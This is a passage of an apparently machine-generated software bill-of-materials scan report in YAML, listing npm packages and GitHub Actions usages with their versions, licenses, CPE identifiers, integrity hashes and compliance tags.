epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 83378a6b374bc40d + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: @types/d3-timer 3.0.2' + title: '@types/d3-timer 3.0.2' + description: 'Package discovered: @types/d3-timer 3.0.2' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: a9187c78265f1b66 + name: '@types/d3-timer' + version: 3.0.2 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:\@types\/d3-timer:\@types\/d3-timer:3.0.2:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@types\/d3-timer:\@types\/d3_timer:3.0.2:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@types\/d3_timer:\@types\/d3-timer:3.0.2:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@types\/d3_timer:\@types\/d3_timer:3.0.2:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@types\/d3:\@types\/d3-timer:3.0.2:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@types\/d3:\@types\/d3_timer:3.0.2:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/%40types/d3-timer@3.0.2 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/@types/d3-timer/-/d3-timer-3.0.2.tgz + integrity: sha512-Ps3T8E8dZDam6fUyNiMkekK3XUsaUEik+idO9/YjPtfj2qruF8tFBXS7XhtE4iIXBLxhmLjP3SXpLhVf21I9Lw== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 4a3de97ef48e263d + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: @types/jsonwebtoken 9.0.10' + title: '@types/jsonwebtoken 9.0.10' + description: 'Package discovered: @types/jsonwebtoken 9.0.10' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: bbe9092f97742247 + name: '@types/jsonwebtoken' + version: 9.0.10 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:\@types\/jsonwebtoken:\@types\/jsonwebtoken:9.0.10:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/%40types/jsonwebtoken@9.0.10 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/@types/jsonwebtoken/-/jsonwebtoken-9.0.10.tgz + integrity: sha512-asx5hIG9Qmf/1oStypjanR7iKTv0gXQ1Ov/jfrX6kS/EO0OFni8orbmGCn0672NHR3kXHwpAwR+B368ZGN/2rA== + dependencies: + '@types/ms': '*' + '@types/node': '*' + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: be245f9788db1459 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: @types/long 4.0.2' + title: '@types/long 4.0.2' + description: 'Package discovered: @types/long 4.0.2' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 69a126982af5137d + name: '@types/long' + version: 4.0.2 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:\@types\/long:\@types\/long:4.0.2:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/%40types/long@4.0.2 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/@types/long/-/long-4.0.2.tgz + integrity: sha512-MqTGEo5bj5t157U6fA/BiDynNkn0YknVdh48CMPkTSpFTVmvao5UQmm7uEF6xBEo7qIMAlY/JSleYaE6VOdpaA== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: b5bebd78899827a5 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: @types/ms 2.1.0' + title: '@types/ms 2.1.0' + description: 'Package discovered: @types/ms 2.1.0' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: fa54533e742eac71 + name: '@types/ms' + version: 2.1.0 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:\@types\/ms:\@types\/ms:2.1.0:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/%40types/ms@2.1.0 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/@types/ms/-/ms-2.1.0.tgz + integrity: sha512-GsCCIZDE/p3i96vtEqx+7dBUGXrc7zeSK3wwPHIaRThS+9OhWIXRqzs4d6k1SVU8g91DrNRWxWUGhp5KXQb2VA== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 191b23786146803d + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: @types/node 20.19.39' + title: '@types/node 20.19.39' + description: 'Package discovered: @types/node 20.19.39' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: c19052194c7f9053 + name: '@types/node' + version: 20.19.39 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:\@types\/node:\@types\/node:20.19.39:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/%40types/node@20.19.39 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/@types/node/-/node-20.19.39.tgz + integrity: sha512-orrrD74MBUyK8jOAD/r0+lfa1I2MO6I+vAkmAWzMYbCcgrN4lCrmK52gRFQq/JRxfYPfonkr4b0jcY7Olqdqbw== + dependencies: + undici-types: ~6.21.0 + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 9b5805676545e7d1 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: @types/node 22.19.17' + title: '@types/node 22.19.17' + description: 'Package discovered: @types/node 22.19.17' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: b0b14dd646c615be + name: '@types/node' + version: 22.19.17 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:\@types\/node:\@types\/node:22.19.17:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/%40types/node@22.19.17 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/@types/node/-/node-22.19.17.tgz + integrity: sha512-wGdMcf+vPYM6jikpS/qhg6WiqSV/OhG+jeeHT/KlVqxYfD40iYJf9/AE1uQxVWFvU7MipKRkRv8NSHiCGgPr8Q== + dependencies: + undici-types: ~6.21.0 + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 08409c71d4ce88d9 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: @types/request 2.48.13' + title: '@types/request 2.48.13' + description: 'Package discovered: @types/request 2.48.13' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 656ffeda0aaf4e8b + name: '@types/request' + version: 2.48.13 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:\@types\/request:\@types\/request:2.48.13:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/%40types/request@2.48.13 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/@types/request/-/request-2.48.13.tgz + integrity: sha512-FGJ6udDNUCjd19pp0Q3iTiDkwhYup7J8hpMW9c4k53NrccQFFWKRho6hvtPPEhnXWKvukfwAlB6DbDz4yhH5Gg== + dependencies: + '@types/caseless': '*' + '@types/node': '*' + '@types/tough-cookie': '*' + form-data: ^2.5.5 + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: dd961f2e03e7418d + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: @types/tough-cookie 4.0.5' + title: '@types/tough-cookie 4.0.5' + description: 'Package discovered: @types/tough-cookie 4.0.5' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: cf24fb05ea581070 + name: '@types/tough-cookie' + version: 4.0.5 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:\@types\/tough-cookie:\@types\/tough-cookie:4.0.5:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@types\/tough-cookie:\@types\/tough_cookie:4.0.5:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@types\/tough_cookie:\@types\/tough-cookie:4.0.5:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@types\/tough_cookie:\@types\/tough_cookie:4.0.5:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@types\/tough:\@types\/tough-cookie:4.0.5:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@types\/tough:\@types\/tough_cookie:4.0.5:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/%40types/tough-cookie@4.0.5 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/@types/tough-cookie/-/tough-cookie-4.0.5.tgz + integrity: sha512-/Ad8+nIOV7Rl++6f1BdKxFSMgmoqEoYbHRpPcx3JEfv8VRsQe9Z4mCXeJBzxs7mbHY/XOZZuXlRNfhpVPbs6ZA== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 7a188cdbd82f20f1 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: @types/ws 8.18.1' + title: '@types/ws 8.18.1' + description: 'Package discovered: @types/ws 8.18.1' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 919683ef9260890b + name: '@types/ws' + version: 8.18.1 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:\@types\/ws:\@types\/ws:8.18.1:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/%40types/ws@8.18.1 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/@types/ws/-/ws-8.18.1.tgz + integrity: sha512-ThVF6DCVhA8kUGy+aazFQ4kXQ7E1Ty7A3ypFOe0IcJV8O/M511G99AW24irKrW56Wt44yG9+ij8FaqoBGkuBXg== + dependencies: + '@types/node': '*' + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 89056081bb223fd4 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: abbrev 2.0.0' + title: abbrev 2.0.0 + description: 'Package discovered: abbrev 2.0.0' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 0277554910df9b38 + name: abbrev + version: 2.0.0 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: ISC + spdxExpression: ISC + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:abbrev:abbrev:2.0.0:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/abbrev@2.0.0 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/abbrev/-/abbrev-2.0.0.tgz + integrity: sha512-6/mh1E2u2YgEsCHdY0Yx5oW+61gZU+1vXaoiHHrpKeuRNNgFvS+/jrwHiQhB5apAf5oB7UB7E19ol2R2LKH8hQ== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 873a6392b6c08a39 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: abort-controller 3.0.0' + title: abort-controller 3.0.0 + description: 'Package discovered: abort-controller 3.0.0' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 02974b3dbbe4d3d6 + name: abort-controller + version: 3.0.0 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:abort-controller:abort-controller:3.0.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:abort-controller:abort_controller:3.0.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:abort_controller:abort-controller:3.0.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:abort_controller:abort_controller:3.0.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:abort:abort-controller:3.0.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:abort:abort_controller:3.0.0:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/abort-controller@3.0.0 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/abort-controller/-/abort-controller-3.0.0.tgz + integrity: sha512-h8lQ8tacZYnR3vNQTgibj+tODHI5/+l06Au2Pcriv/Gmet0eaj4TwWH41sO9wnHDiQsEj19q0drzdWdeAHtweg== + dependencies: + event-target-shim: ^5.0.0 + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 661684530a17a73f + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: abs-svg-path 0.1.1' + title: abs-svg-path 0.1.1 + description: 'Package discovered: abs-svg-path 0.1.1' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 2eb8f1fab63663a1 + name: abs-svg-path + version: 0.1.1 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:abs-svg-path:abs-svg-path:0.1.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:abs-svg-path:abs_svg_path:0.1.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:abs_svg_path:abs-svg-path:0.1.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:abs_svg_path:abs_svg_path:0.1.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:abs-svg:abs-svg-path:0.1.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:abs-svg:abs_svg_path:0.1.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:abs_svg:abs-svg-path:0.1.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:abs_svg:abs_svg_path:0.1.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:abs:abs-svg-path:0.1.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:abs:abs_svg_path:0.1.1:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/abs-svg-path@0.1.1 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/abs-svg-path/-/abs-svg-path-0.1.1.tgz + integrity: sha512-d8XPSGjfyzlXC3Xx891DJRyZfqk5JU0BJrDQcsWomFIV1/BIzPW5HDH5iDdWpqWaav0YVIEzT1RHTwWr0FFshA== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 27802507a1dbe242 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: accepts 1.3.8' + title: accepts 1.3.8 + description: 'Package discovered: accepts 1.3.8' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: e96668e505272792 + name: accepts + version: 1.3.8 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:accepts:accepts:1.3.8:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/accepts@1.3.8 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/accepts/-/accepts-1.3.8.tgz + integrity: sha512-PYAthTa2m2VKxuvSD3DPC/Gy+U+sOA1LAuT8mkmRuvw+NACSaeXEQ+NHcVF7rONl6qcaxV3Uuemwawk+7+SJLw== + dependencies: + mime-types: ~2.1.34 + negotiator: 0.6.3 + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 352cd9201a8ce90d + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /node_modules/@ungap/structured-clone/.github/workflows/node.js.yml + startLine: 0 + message: 'Package discovered: actions/checkout v2' + title: actions/checkout v2 + description: 'Package discovered: actions/checkout v2' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: b54bfb1da26ce9cd + name: actions/checkout + version: v2 + type: github-action + foundBy: github-actions-usage-cataloger + locations: + - path: /node_modules/@ungap/structured-clone/.github/workflows/node.js.yml + accessPath: /node_modules/@ungap/structured-clone/.github/workflows/node.js.yml + annotations: + evidence: primary + licenses: [] + language: '' + cpes: + - cpe: cpe:2.3:a:actions\/checkout:actions\/checkout:v2:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:github/actions/checkout@v2 + metadataType: github-actions-use-statement + metadata: + value: actions/checkout@v2 + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 3e33aad3d5646f4e + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /node_modules/busboy/.github/workflows/ci.yml + startLine: 0 + message: 'Package discovered: actions/checkout v2' + title: actions/checkout v2 + description: 'Package discovered: actions/checkout v2' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 8939931398f7f376 + name: actions/checkout + version: v2 + type: github-action + foundBy: github-actions-usage-cataloger + locations: + - path: /node_modules/busboy/.github/workflows/ci.yml + accessPath: /node_modules/busboy/.github/workflows/ci.yml + annotations: + evidence: primary + licenses: [] + language: '' + cpes: + - cpe: cpe:2.3:a:actions\/checkout:actions\/checkout:v2:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:github/actions/checkout@v2 + metadataType: github-actions-use-statement + metadata: + value: actions/checkout@v2 + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: c9bdf9f43faeb29d + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /node_modules/busboy/.github/workflows/lint.yml + startLine: 0 + message: 'Package discovered: actions/checkout v2' + title: actions/checkout v2 + description: 'Package discovered: actions/checkout v2' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 9ed4a1365893a541 + name: actions/checkout + version: v2 + type: github-action + foundBy: github-actions-usage-cataloger + locations: + - path: /node_modules/busboy/.github/workflows/lint.yml + accessPath: /node_modules/busboy/.github/workflows/lint.yml + annotations: + evidence: primary + licenses: [] + language: '' + cpes: + - cpe: cpe:2.3:a:actions\/checkout:actions\/checkout:v2:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:github/actions/checkout@v2 + metadataType: github-actions-use-statement + metadata: + value: actions/checkout@v2 + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: b70772177f81ea1d + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /node_modules/streamsearch/.github/workflows/ci.yml + startLine: 0 + message: 'Package discovered: actions/checkout v2' + title: actions/checkout v2 + description: 'Package discovered: actions/checkout v2' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: bf473f4674a4b4c1 + name: actions/checkout + version: v2 + type: github-action + foundBy: github-actions-usage-cataloger + locations: + - path: /node_modules/streamsearch/.github/workflows/ci.yml + accessPath: /node_modules/streamsearch/.github/workflows/ci.yml + annotations: + evidence: primary + licenses: [] + language: '' + cpes: + - cpe: cpe:2.3:a:actions\/checkout:actions\/checkout:v2:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:github/actions/checkout@v2 + metadataType: github-actions-use-statement + metadata: + value: actions/checkout@v2 + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: ec35dedecdc67bae + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /node_modules/streamsearch/.github/workflows/lint.yml + startLine: 0 + message: 'Package discovered: actions/checkout v2' + title: actions/checkout v2 + description: 'Package discovered: actions/checkout v2' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 7ec5891cc205a593 + name: actions/checkout + version: v2 + type: github-action + foundBy: github-actions-usage-cataloger + locations: + - path: /node_modules/streamsearch/.github/workflows/lint.yml + accessPath: /node_modules/streamsearch/.github/workflows/lint.yml + annotations: + evidence: primary + licenses: [] + language: '' + cpes: + - cpe: cpe:2.3:a:actions\/checkout:actions\/checkout:v2:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:github/actions/checkout@v2 + metadataType: github-actions-use-statement + metadata: + value: actions/checkout@v2 + compliance: + cisControlsV8_1: *id010 + 